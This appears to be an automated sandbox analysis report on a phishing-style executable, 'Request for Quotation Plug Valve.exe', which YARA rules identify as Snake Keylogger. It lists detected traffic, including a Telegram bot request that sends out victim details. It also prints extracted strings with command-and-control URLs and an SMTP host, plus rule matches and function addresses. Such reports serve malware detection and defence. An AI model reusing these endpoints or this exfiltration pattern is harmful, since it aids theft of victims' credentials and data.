Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:688098%0D%0ADate%20and%20Time:%2008/10/2024%20/%2023:13:49%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20688098%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org
Source: global traffic	DNS traffic detected: DNS query: us2.smtp.mailhostbox.com

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Tue, 08 Oct 2024 13:10:33 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Source: Request for Quotation Plug Valve.exe, 00000003.00000002.4707717001.0000000002DD2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?L
Source: Request for Quotation Plug Valve.exe, 00000001.00000002.2250478185.0000000003839000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation Plug Valve.exe, 00000003.00000002.4703404877.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
Source: Request for Quotation Plug Valve.exe, 00000001.00000002.2250478185.0000000003839000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation Plug Valve.exe, 00000003.00000002.4707717001.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation Plug Valve.exe, 00000003.00000002.4703404877.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://aborters.duckdns.org:8081
Source: Request for Quotation Plug Valve.exe, 00000001.00000002.2250478185.0000000003839000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation Plug Valve.exe, 00000003.00000002.4707717001.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation Plug Valve.exe, 00000003.00000002.4703404877.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://anotherarmy.dns.army:8081
Source: Request for Quotation Plug Valve.exe, 00000003.00000002.4707717001.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: Request for Quotation Plug Valve.exe, 00000003.00000002.4707717001.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: Request for Quotation Plug Valve.exe, 00000001.00000002.2250478185.0000000003839000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation Plug Valve.exe, 00000003.00000002.4703404877.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: Request for Quotation Plug Valve.exe, 00000003.00000002.4707717001.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Request for Quotation Plug Valve.exe, 00000003.00000002.4707717001.0000000002DD2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://us2.smtp.mailhostbox.com
Source: Request for Quotation Plug Valve.exe, 00000001.00000002.2250478185.0000000003839000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation Plug Valve.exe, 00000003.00000002.4707717001.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation Plug Valve.exe, 00000003.00000002.4703404877.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://varders.kozow.com:8081
Source: Request for Quotation Plug Valve.exe, 00000003.00000002.4710627227.0000000003C01000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation Plug Valve.exe, 00000003.00000002.4710627227.0000000003EEE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: Request for Quotation Plug Valve.exe, 00000003.00000002.4707717001.0000000002CC6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: Request for Quotation Plug Valve.exe, 00000001.00000002.2250478185.0000000003839000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation Plug Valve.exe, 00000003.00000002.4707717001.0000000002CC6000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation Plug Valve.exe, 00000003.00000002.4703404877.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: Request for Quotation Plug Valve.exe, 00000003.00000002.4707717001.0000000002CC6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: Request for Quotation Plug Valve.exe, 00000003.00000002.4707717001.0000000002CC6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:688098%0D%0ADate%20a
Source: Request for Quotation Plug Valve.exe, 00000003.00000002.4710627227.0000000003C01000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation Plug Valve.exe, 00000003.00000002.4710627227.0000000003EEE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: Request for Quotation Plug Valve.exe, 00000003.00000002.4710627227.0000000003C01000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation Plug Valve.exe, 00000003.00000002.4710627227.0000000003EEE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: Request for Quotation Plug Valve.exe, 00000003.00000002.4710627227.0000000003C01000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation Plug Valve.exe, 00000003.00000002.4710627227.0000000003EEE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: Request for Quotation Plug Valve.exe, 00000003.00000002.4707717001.0000000002D67000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: Request for Quotation Plug Valve.exe, 00000003.00000002.4707717001.0000000002D71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=enlB
Source: Request for Quotation Plug Valve.exe, 00000003.00000002.4710627227.0000000003C01000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation Plug Valve.exe, 00000003.00000002.4710627227.0000000003EEE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: Request for Quotation Plug Valve.exe, 00000003.00000002.4710627227.0000000003C01000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation Plug Valve.exe, 00000003.00000002.4710627227.0000000003EEE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: Request for Quotation Plug Valve.exe, 00000003.00000002.4710627227.0000000003C01000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation Plug Valve.exe, 00000003.00000002.4710627227.0000000003EEE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: Request for Quotation Plug Valve.exe, 00000003.00000002.4707717001.0000000002C9F000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation Plug Valve.exe, 00000003.00000002.4707717001.0000000002C2F000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation Plug Valve.exe, 00000003.00000002.4707717001.0000000002CC6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: Request for Quotation Plug Valve.exe, 00000001.00000002.2250478185.0000000003839000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation Plug Valve.exe, 00000003.00000002.4707717001.0000000002C2F000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation Plug Valve.exe, 00000003.00000002.4703404877.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: Request for Quotation Plug Valve.exe, 00000003.00000002.4707717001.0000000002C59000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33
Source: Request for Quotation Plug Valve.exe, 00000003.00000002.4707717001.0000000002C9F000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation Plug Valve.exe, 00000003.00000002.4707717001.0000000002CC6000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation Plug Valve.exe, 00000003.00000002.4707717001.0000000002C59000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33$
Source: Request for Quotation Plug Valve.exe, 00000003.00000002.4710627227.0000000003C01000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation Plug Valve.exe, 00000003.00000002.4710627227.0000000003EEE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: Request for Quotation Plug Valve.exe, 00000003.00000002.4710627227.0000000003C01000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation Plug Valve.exe, 00000003.00000002.4710627227.0000000003EEE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: Request for Quotation Plug Valve.exe, 00000003.00000002.4707717001.0000000002D98000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/
Source: Request for Quotation Plug Valve.exe, 00000003.00000002.4707717001.0000000002DA2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/lB

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49821
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49831
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 49838 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 49812 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49821 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49803 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49831 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49838
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49803
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49812

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49838 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: 1.2.Request for Quotation Plug Valve.exe.3839970.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 3.2.Request for Quotation Plug Valve.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 1.2.Request for Quotation Plug Valve.exe.3839970.4.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 3.2.Request for Quotation Plug Valve.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 1.2.Request for Quotation Plug Valve.exe.3839970.4.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 3.2.Request for Quotation Plug Valve.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 1.2.Request for Quotation Plug Valve.exe.387c990.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 1.2.Request for Quotation Plug Valve.exe.387c990.2.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 1.2.Request for Quotation Plug Valve.exe.387c990.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 1.2.Request for Quotation Plug Valve.exe.387c990.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 1.2.Request for Quotation Plug Valve.exe.387c990.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 1.2.Request for Quotation Plug Valve.exe.3839970.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 1.2.Request for Quotation Plug Valve.exe.3839970.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000003.00000002.4703404877.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000001.00000002.2250478185.0000000003839000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: Request for Quotation Plug Valve.exe PID: 6620, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: Request for Quotation Plug Valve.exe PID: 6456, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: Request for Quotation Plug Valve.exe

Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Code function: 3_2_02ABD278	3_2_02ABD278
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Code function: 3_2_02AB5362	3_2_02AB5362
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Code function: 3_2_02ABA088	3_2_02ABA088
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Code function: 3_2_02ABC19E	3_2_02ABC19E
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Code function: 3_2_02AB7118	3_2_02AB7118
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Code function: 3_2_02ABC738	3_2_02ABC738
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Code function: 3_2_02ABC468	3_2_02ABC468
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Code function: 3_2_02ABCA08	3_2_02ABCA08
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Code function: 3_2_02AB69A0	3_2_02AB69A0
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Code function: 3_2_02ABE988	3_2_02ABE988
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Code function: 3_2_02ABCFAA	3_2_02ABCFAA
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Code function: 3_2_02ABCCD8	3_2_02ABCCD8
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Code function: 3_2_02ABF631	3_2_02ABF631
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Code function: 3_2_02ABFA88	3_2_02ABFA88
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Code function: 3_2_02AB29E0	3_2_02AB29E0
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Code function: 3_2_02ABE97A	3_2_02ABE97A
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Code function: 3_2_02AB3E09	3_2_02AB3E09
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Code function: 3_2_068E1E80	3_2_068E1E80
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Code function: 3_2_068E17A0	3_2_068E17A0
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Code function: 3_2_068E0B30	3_2_068E0B30
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Code function: 3_2_068E9C18	3_2_068E9C18
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Code function: 3_2_068E5028	3_2_068E5028
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Code function: 3_2_068E9548	3_2_068E9548
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Code function: 3_2_068E2968	3_2_068E2968
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Code function: 3_2_068EE6AA	3_2_068EE6AA
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Code function: 3_2_068EE6B0	3_2_068EE6B0
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Code function: 3_2_068EEAF8	3_2_068EEAF8
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Code function: 3_2_068EDE00	3_2_068EDE00
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Code function: 3_2_068EE24A	3_2_068EE24A
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Code function: 3_2_068EE258	3_2_068EE258
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Code function: 3_2_068E1E70	3_2_068E1E70
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Code function: 3_2_068E178F	3_2_068E178F
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Code function: 3_2_068E8B90	3_2_068E8B90
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Code function: 3_2_068EF3A8	3_2_068EF3A8
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Code function: 3_2_068E8BA0	3_2_068E8BA0
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Code function: 3_2_068EF3B8	3_2_068EF3B8
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Code function: 3_2_068EEB08	3_2_068EEB08
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Code function: 3_2_068E9328	3_2_068E9328
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Code function: 3_2_068E0B20	3_2_068E0B20
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Code function: 3_2_068EEF51	3_2_068EEF51
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Code function: 3_2_068EEF60	3_2_068EEF60
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Code function: 3_2_068ECC8F	3_2_068ECC8F
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Code function: 3_2_068ECCA0	3_2_068ECCA0
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Code function: 3_2_068ED0F8	3_2_068ED0F8
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Code function: 3_2_068E0006	3_2_068E0006
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Code function: 3_2_068EF802	3_2_068EF802
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Code function: 3_2_068E5018	3_2_068E5018
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Code function: 3_2_068EF810	3_2_068EF810
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Code function: 3_2_068E0040	3_2_068E0040
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Code function: 3_2_068EFC5E	3_2_068EFC5E
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Code function: 3_2_068EFC68	3_2_068EFC68
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Code function: 3_2_068ED999	3_2_068ED999
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Code function: 3_2_068ED9A8	3_2_068ED9A8
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Code function: 3_2_068EDDF2	3_2_068EDDF2
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Code function: 3_2_068ED540	3_2_068ED540
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Code function: 3_2_068E295B	3_2_068E295B
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Code function: 3_2_068ED550	3_2_068ED550

Source: Request for Quotation Plug Valve.exe, 00000001.00000002.2247638196.0000000000A5E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs Request for Quotation Plug Valve.exe
Source: Request for Quotation Plug Valve.exe, 00000001.00000002.2250478185.0000000003839000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs Request for Quotation Plug Valve.exe
Source: Request for Quotation Plug Valve.exe, 00000001.00000002.2250478185.0000000003839000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs Request for Quotation Plug Valve.exe
Source: Request for Quotation Plug Valve.exe, 00000001.00000002.2253417863.0000000006D70000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs Request for Quotation Plug Valve.exe
Source: Request for Quotation Plug Valve.exe, 00000001.00000000.2235514481.0000000000442000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameYpWp.exe, vs Request for Quotation Plug Valve.exe
Source: Request for Quotation Plug Valve.exe, 00000001.00000002.2249572786.000000000286E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs Request for Quotation Plug Valve.exe
Source: Request for Quotation Plug Valve.exe, 00000003.00000002.4703643862.0000000000CF7000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs Request for Quotation Plug Valve.exe
Source: Request for Quotation Plug Valve.exe, 00000003.00000002.4703404877.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs Request for Quotation Plug Valve.exe
Source: Request for Quotation Plug Valve.exe	Binary or memory string: OriginalFilenameYpWp.exe, vs Request for Quotation Plug Valve.exe

Source: Request for Quotation Plug Valve.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 1.2.Request for Quotation Plug Valve.exe.3839970.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 3.2.Request for Quotation Plug Valve.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 1.2.Request for Quotation Plug Valve.exe.3839970.4.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 3.2.Request for Quotation Plug Valve.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 1.2.Request for Quotation Plug Valve.exe.3839970.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 3.2.Request for Quotation Plug Valve.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 1.2.Request for Quotation Plug Valve.exe.387c990.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 1.2.Request for Quotation Plug Valve.exe.387c990.2.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 1.2.Request for Quotation Plug Valve.exe.387c990.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 1.2.Request for Quotation Plug Valve.exe.387c990.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 1.2.Request for Quotation Plug Valve.exe.387c990.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
